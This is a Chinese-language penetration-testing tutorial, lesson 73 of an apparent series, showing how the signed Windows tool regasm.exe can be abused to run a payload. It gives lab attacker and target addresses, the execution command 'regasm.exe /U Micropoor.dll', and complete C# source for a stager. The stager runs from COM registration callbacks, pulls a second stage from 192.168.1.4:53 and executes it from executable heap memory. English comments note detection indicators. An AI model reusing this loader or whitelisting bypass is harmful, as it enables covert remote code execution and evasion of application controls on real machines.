第七十三课:基于白名单Regasm.exe执行payload第三季

Regasm简介:

Regasm 为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe 是 Microsoft Corporation 开发的合法程序文件,它与 Microsoft .NET Assembly Registration Utility(.NET 程序集注册工具)相关联。
说明:Regasm.exe 所在路径没有被系统添加到 PATH 环境变量中,因此直接输入 regasm 命令无法被识别,需要使用完整路径调用。
基于白名单Regasm.exe配置payload:
Windows 7 默认位置:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
攻击机:192.168.1.4 Debian 靶机:192.168.1.3 Windows 7

配置攻击机msf:

靶机执行:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll

附录:Micropoor.cs

注:x86 payload
using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;
namespace HYlDKsYF
{
/// <summary>
/// COM-registrable <see cref="ServicedComponent"/> whose only job is to give
/// regasm.exe a hook. The registration callbacks below are invoked by the
/// registration tool itself, so the code in <see cref="ZApOAKJKY"/> runs inside
/// the Microsoft-shipped regasm.exe process rather than in a binary of the
/// author's own. From a detection standpoint the process of interest is
/// therefore regasm.exe, not this assembly.
/// </summary>
public class kxKhdVzWQXolmmF : ServicedComponent {
// The constructor only prints a marker; it is not on the path exercised via regasm.exe.
public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); }
// Called by regasm.exe when the assembly is registered. The string argument
// (presumably the registry key being written) is ignored.
[ComRegisterFunction]
public static void RegisterClass ( string pNNHrTZzW )
{
ZApOAKJKY.QYJOTklTwn();
}
// Called by regasm.exe on unregistration (the `/U` switch shown on this page).
// It reaches exactly the same entry point as registration, so "unregister" is not
// a safe or no-op action here: regasm.exe /U on an unknown assembly deserves the
// same scrutiny as a registration.
[ComUnregisterFunction]
public static void UnRegisterClass ( string pNNHrTZzW )
{
ZApOAKJKY.QYJOTklTwn();
}
}
/// <summary>
/// Stager. Downloads a second stage over a TCP connection and executes it from an
/// executable private heap inside the calling process (regasm.exe on this page).
/// Entry point is <see cref="QYJOTklTwn"/>, reached from the COM registration and
/// unregistration callbacks in <see cref="kxKhdVzWQXolmmF"/>.
/// </summary>
public class ZApOAKJKY
// Direct kernel32 P/Invoke. Parameter names are randomised; each signature maps to the
// Win32 function of the same name. Handles and pointers are declared as UInt32, which only
// makes sense for a 32-bit process (the page states this is an x86 payload).
{ [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);
[DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);
[DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);
// Second half of the next line is the stage downloader: connects to aCWWUttzmy:iJGvqiEDGLhjr,
// reads a 4-byte length prefix and then the stage body. Returns null when the connect fails.
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy, int iJGvqiEDGLhjr) {
// Endpoint from the caller-supplied address/port (QYJOTklTwn passes a hard-coded pair).
IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy), iJGvqiEDGLhjr);
Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
// Any connect failure is swallowed and reported as null; the caller then does nothing.
// Network indicator: an outbound TCP connection whose originating process is regasm.exe.
try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }
catch { return null;}
// Wire format: a 4-byte stage length (host byte order, little-endian on x86) ...
byte[] Bjpvhc = new byte[4];
MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0);
int IETFBI = BitConverter.ToInt32(Bjpvhc, 0);
// ... followed by that many bytes. The buffer is 5 bytes larger than the stage because
// bytes 0..4 are filled in locally below; the received stage is placed from offset 5.
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5];
int JFPJLlk = 0;
// Reads in chunks of at most 4096 bytes until the announced length has been consumed.
while (JFPJLlk < IETFBI)
{ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk + 5, (IETFBI ‐ JFPJLlk) < 4096 ? (IETFBI ‐ JFPJLlk) : 4096, 0);}
// Local prefix: 0xBF followed by the 4-byte socket handle. On x86, BF imm32 encodes
// `mov edi, imm32`, so the stage begins with this socket's handle in EDI; presumably the
// stage keeps using this already-open connection, which is why the socket is never closed.
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);
Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4); ZKSAAFwxgSDnTW[0] = 0xBF;
return ZKSAAFwxgSDnTW;}
// Runs the downloaded stage in-process. Does nothing when the download failed (null).
static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) {
if (KNCtlJWAmlqJ != null) {
// 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE: a private heap whose pages are executable.
// Initial size = stage length, maximum size 0 = growable.
// Host indicator: executable heap memory appearing inside a .NET framework tool process.
UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Lengt h, 0);
// 0x00000008 is HEAP_ZERO_MEMORY.
UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJWAmlqJ.Length);
// Copies the stage bytes into the executable heap block.
RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCtlJWAmlqJ.Length);
UInt32 ijifOEfllRl = 0;
// Starts a thread whose start address is the heap block itself (no parameter, not suspended).
// Host indicator: a thread start address that lies in heap memory rather than in a loaded module.
IntPtr ihXuoEirmz = CreateThread(0, 0, sDPjIMhJIOAlwn, IntPtr.Zero, 0, ref ijifOEfllRl);
// 0xFFFFFFFF is INFINITE: the registration callback, and with it regasm.exe, blocks for as
// long as the stage thread runs. A long-lived regasm.exe process is itself anomalous.
WaitForSingleObject(ihXuoEirmz, 0xFFFFFFFF);}}
// Entry point reached from the COM (un)registration callbacks. Address and port are
// hard-coded: 192.168.1.4 is the attacker host listed on this page, and 53 is normally
// the DNS port, so outbound TCP/53 from regasm.exe is a usable network indicator.
public static void QYJOTklTwn() {
byte[] ZKSAAFwxgSDnTW = null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.1.4", 53);
TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);
} } }